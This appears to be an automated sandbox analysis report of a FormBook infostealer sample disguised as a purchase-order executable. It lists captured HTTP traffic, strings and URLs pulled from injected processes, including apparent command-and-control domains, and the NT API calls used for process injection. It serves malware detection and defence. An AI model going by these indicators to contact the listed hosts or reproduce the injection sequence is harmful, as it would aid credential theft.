                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKdEhhiEIZicQifgDUOwgPYOTYRYZa8iEhqSlu6dC9zytsaFlLeQcYQx0KVvEkpAKydGZMUE%2B1JRbJNv%2ByP5kF4z5H7NiKjhTYaL7WTD2fNxQg90DrPq17jY0ucwnIjJYr5dieAfqL18"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481df6896f0072-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 49 ec 44 60 d4 8a b4 Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uD4l0%2FJdSKjgA%2FvD7RNAAK02qN%2BjGt5SAa2WE9QITWnuJYrefV44qJEUWTvKT187Z3MrtbLRLHjTg34RC2kMYc8mCcqn5x2yJCwcVIorbVq9TsgdCdF9N3wRdR3mBGG%2BBS%2FIRabrV0eh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481e068dcb0b99-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: PO 20495088.exe, 00000000.00000002.2338435823.0000000002F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Fedegaritech.online
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/Cerebral_Palsy_Types.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/Feeds.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN5
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/Fodder.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/Green_Foods_Benefits.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/USC_University_Affiliated_Program.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZ
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/__media__/design/underconstructionnotice.php?d=fedegaritech.online
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fedegaritech.online/__media__/js/trademark.php?d=fedegaritech.online&type=ns
                Source: sKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ssrnoremt-rise.sbs
                Source: sKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ssrnoremt-rise.sbs/3jsc/
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_des
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10330
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sdiagnhost.exe, 00000009.00000003.2767472147.000000000746B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000005720000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000004010000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0042C6F3 NtClose,6_2_0042C6F3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762B60 NtClose,LdrInitializeThunk,6_2_01762B60
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01762DF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01762C70
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017635C0 NtCreateMutant,LdrInitializeThunk,6_2_017635C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01764340 NtSetContextThread,6_2_01764340
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01764650 NtSuspendThread,6_2_01764650
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762BF0 NtAllocateVirtualMemory,6_2_01762BF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762BE0 NtQueryValueKey,6_2_01762BE0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762BA0 NtEnumerateValueKey,6_2_01762BA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762B80 NtQueryInformationFile,6_2_01762B80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762AF0 NtWriteFile,6_2_01762AF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762AD0 NtReadFile,6_2_01762AD0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762AB0 NtWaitForSingleObject,6_2_01762AB0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762D30 NtUnmapViewOfSection,6_2_01762D30
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762D10 NtMapViewOfSection,6_2_01762D10
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762D00 NtSetInformationFile,6_2_01762D00
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762DD0 NtDelayExecution,6_2_01762DD0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762DB0 NtEnumerateKey,6_2_01762DB0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762C60 NtCreateKey,6_2_01762C60
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762C00 NtQueryInformationProcess,6_2_01762C00
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762CF0 NtOpenProcess,6_2_01762CF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762CC0 NtQueryVirtualMemory,6_2_01762CC0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762CA0 NtQueryInformationToken,6_2_01762CA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762F60 NtCreateProcessEx,6_2_01762F60
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762F30 NtCreateSection,6_2_01762F30
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762FE0 NtCreateFile,6_2_01762FE0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762FB0 NtResumeThread,6_2_01762FB0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762FA0 NtQuerySection,6_2_01762FA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762F90 NtProtectVirtualMemory,6_2_01762F90
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762E30 NtWriteVirtualMemory,6_2_01762E30
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762EE0 NtQueueApcThread,6_2_01762EE0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762EA0 NtAdjustPrivilegesToken,6_2_01762EA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762E80 NtReadVirtualMemory,6_2_01762E80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01763010 NtOpenDirectoryObject,6_2_01763010
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01763090 NtSetValueKey,6_2_01763090
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017639B0 NtGetContextThread,6_2_017639B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01763D70 NtOpenThread,6_2_01763D70
